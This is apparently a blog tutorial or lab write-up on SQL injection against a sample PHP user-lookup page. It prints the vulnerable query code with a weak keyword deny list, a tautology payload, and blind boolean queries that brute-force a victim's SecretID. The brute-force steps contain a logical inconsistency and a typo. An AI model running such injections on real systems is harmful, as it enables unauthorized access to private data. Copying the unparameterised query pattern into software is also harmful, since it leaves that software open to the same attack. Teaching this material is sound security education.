Advertisements
Home > Information Technology, programming, Science, Security > Attack C: SQL Injection

Attack C: SQL Injection

In this case, we want to know how to retrieve an attribute that only exists in the database. Suppose we use the user.php on Attack A for querying a user profile. The task is to know the SecretID of a user generated everytime a user is registered. For this case we are given the SecretID to be 1 to 999.

1. Study the input form

Now, most of hacker would not have the source code and have to try tampered with the input form by guessing what character is filtered out. But for the sake of simplicity, here’s the source code of the View User function:

$selecteduser = $_GET['user'];
$forbiddenSQL = 'ABORT|ACTION|AFTER|ALTER|ANALYZE|ATTACH|AUTOINCREMENT|
                  BEGIN|CASCADE|CASE|CAST|CHECK|COLLATE|COLUMN|COMMIT|
                  CONFLICT|CONSTRAINT|CREATE|CROSS|CURRENT_DATE|
                  CURRENT_TIME|CURRENT_TIMESTAMP|DATABASE|DEFAULT|
                  DEFERRABLE|DEFERRED|DELETE|DETACH|DISTINCT|DROP|EACH|
                  ESCAPE|EXCEPT|EXCLUSIVE|EXISTS|EXPLAIN|FAIL|FOREIGN|
                  FROM|FULL|GLOB|GROUP|HAVING|IGNORE|IMMEDIATE|INDEX|
                  INDEXED|INITIALLY|INNER|INSERT|INSTEAD|INTERSECT|
                  INTO|ISNULL|JOIN|KEY|LEFT|LIKE|LIMIT|MATCH|NATURAL|
                  NOTNULL|NULL|OUTER|PLAN|PRAGMA|PRIMARY|QUERY|RAISE|
                  REFERENCES|REGEXP|REINDEX|RELEASE|RENAME|REPLACE|
                  RESTRICT|RIGHT|ROLLBACK|ROW|SAVEPOINT|SELECT|SET|TABLE|
                  TEMP|TEMPORARY|THEN|TRANSACTION|TRIGGER|UNION|UNIQUE|
                  UPDATE|USING|VACUUM|VALUES|VIEW|VIRTUAL|WHEN';
if (!preg_match("/$forbiddenSQL/i", $selecteduser))
{
   $sql = "SELECT Profile, Username, Peanuts FROM Person " .
           "WHERE Username='$selecteduser'";
   $rs = $db->executeQuery($sql);
.
.
.

This is the part of the source code to sanitize the user input form. The preg_match will filtered out all the the reserved word in the $forbiddenSQL variable. How do we conclude this? Well, it seems that the programmer forget to filtered out quotes, space, AND, and semicolon which will be advantageous in our SQL injection scheme.

2. Study the Query

Once you know what can be typed and not in the user input form, your next task is to study the query. Take a look again at this query:

$sql = "SELECT Profile, Username, Peanuts FROM Person " .
           "WHERE Username='$selecteduser'";

We can tamperd the Username with ‘ AND ‘1’=’1 just to get a random user, because the query is translated into:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='' AND '1'='1'

Which will always return true for every row inspected.

3. Brute Force your way out

Now, how to get the SecretID of the particular user? It’s a little hard since you can’t use union to merge the table with the Secret ID column. Our last option is brute-force. Thank God, that the SecretID is between 1 to 999 so our brute-force is not to0 complicated. Now set up your first guest, maybe the SecretID is above 100:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>100

The form returns a not-found notice. Now, let’s try with 200 as our lower boundary:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>200

The form returns the victim profile. Now we know the SecretID is above 200. Now set the upper boundary to 300 to narrow our search:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>200 AND Secret ID<300

The page returns yet another profile of victim. Now you just have to lower the upper-bound until you have reached the conclusion of the SecretID of victim which is:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID=201
Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: